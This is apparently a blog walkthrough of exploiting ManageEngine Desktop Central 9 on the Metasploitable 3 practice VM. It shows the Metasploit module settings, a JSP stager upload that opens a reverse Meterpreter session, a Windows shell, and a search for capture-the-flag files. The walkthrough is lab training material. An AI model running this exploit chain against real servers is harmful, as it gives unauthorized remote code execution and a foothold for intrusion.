Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 10.20.10.23 yes The target address

RPORT 8020 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI / yes The base path for ManageEngine Desktop Central

VHOST no HTTP server virtual host

Exploit target:

Id Name

-- ----

0 ManageEngine Desktop Central 9 on Windows

I have to change the RPORT to 8022

msf exploit(manageengine_connectionid_write) > set RPORT 8022

RPORT => 8022

msf exploit(manageengine_connectionid_write) > run

[*] Started reverse TCP handler on 10.23.10.200:4444

[*] Creating JSP stager

[*] Uploading JSP stager MoRCg.jsp...

[*] Executing stager...

[*] Sending stage (957487 bytes) to 10.20.10.23

[*] Meterpreter session 1 opened (10.23.10.200:4444 -> 10.20.10.23:64823) at 2017-01-11 22:11:46 -0500

[+] Deleted ../webapps/DesktopCentral/jspf/MoRCg.jsp

meterpreter > dir

Listing: C:\ManageEngine\DesktopCentral_Server\bin

==================================================

Mode Size Type Last modified Name

---- ---- ---- ------------- ----

100666/rw-rw-rw- 5 fil 2016-12-17 15:30:38 -0500 .lock

100777/rwxrwxrwx 587776 fil 2015-10-07 09:32:36 -0400 7za.exe

100666/rw-rw-rw- 2028 fil 2015-10-07 09:32:38 -0400 ComputerList.vbs

100666/rw-rw-rw- 624 fil 2016-12-17 15:29:35 -0500 ConfigServer_log.txt

100777/rwxrwxrwx 53248 fil 2015-10-07 09:32:38 -0400 ConvertSIDTOAccountName.exe

100777/rwxrwxrwx 228 fil 2015-10-07 09:32:36 -0400 CopyFolder.bat

100777/rwxrwxrwx 944 fil 2015-10-07 09:32:38 -0400 DCService.bat

...

meterpreter > pwd

C:\ManageEngine\DesktopCentral_Server\bin

meterpreter > shell

Process 5984 created.

Channel 2 created.

Microsoft Windows [Version 6.1.7601]

C:\ManageEngine\DesktopCentral_Server\bin>whoami

whoami

nt authority\local service

C:\ManageEngine\DesktopCentral_Server\bin>

I got a Remote Shell :) you can use this one to look for flags/cards or to gather more information about the system.

Back in meterpreter

meterpreter > search -f king*

Found 4 results...

c:\vagrant\resources\flags\kingofclubs.exe (824563 bytes)

c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-150x150.png (46738 bytes)

c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-214x300.png (130832 bytes)

c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds.png (585695 bytes)

Saturday, January 21, 2017

Metasploitable 3 - Exploiting Tomcat

Metasploitable 3

Exploiting Tomcat

Wednesday, January 11, 2017

Metasploitable 3 - ManageEngine DesktopCentral 9

Blog Archive